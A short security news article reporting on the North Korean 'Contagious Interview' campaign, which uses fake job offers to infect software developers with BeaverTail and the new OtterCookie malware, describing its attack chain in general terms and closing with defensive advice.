2 min Security

North Korean hackers target new malware at software developers

North Korean hackers target new malware at software developers

A North Korean hacker campaign, “Contagious Interview,” targets software developers with fake job postings. This is to install malware such as BeaverTail and InvisibleFerret. The malware has been active since at least December 2022, according to researchers from cybersecurity firm Palo Alto Networks.

A report by NTT Security Japan reports that the Contagious Interview operation uses a new type of malware. One calls it OtterCookie. This malware was likely introduced in September. A new variant of it was found by researchers in November “in the wild”.

OtterCookie attack chain

Similar to attacks documented by researchers at Palo Alto Networks’ Unit42, OtterCookie is delivered via a loader. That retrieves JSON data. And executes the “cookie” property as JavaScript code.

According to NTT, BeaverTail remains the most common payload, but OtterCookie is sometimes deployed along with BeaverTail. The loader infects targets via Node.js projects or npm packages downloaded from GitHub or Bitbucket. Recently, however, files built as Qt or Electron applications have also been used.

Once OtterCookie is active on the target device, it establishes secure communication links to its Command and Control (C2) infrastructure via the Socket.IO WebSocket tool and waits for commands.

The researchers observed shell commands aimed at data theft, such as collecting keys from crypto wallets, documents, images and other valuable information. “The September version of OtterCookie already had built-in functionalities to steal keys from crypto wallets,” NTT explained. “For example, the checkForSensitiveData function used regular expressions to search for private Ethereum keys.” The researchers noted that this was modified in the November variant of the malware to be executed via external shell commands.

The latest version of OtterCookie can also exfiltrate data from the target device’s clipboard, which may contain sensitive information.

Frequently used reconnaissance commands, such as “ls” and “cat,” were detected, indicating that the attackers are trying to explore and prepare the environment for deeper infiltration or lateral movement.

New techniques

The emergence of new malware and the diversification of infection methods show that the threat actors behind the Contagious Interview campaign are experimenting with new tactics.

Software developers are advised to verify information about potential employers and be careful when running code on personal or work computers.

Read more: Scammers abuse AI to acquire IT jobs in key companies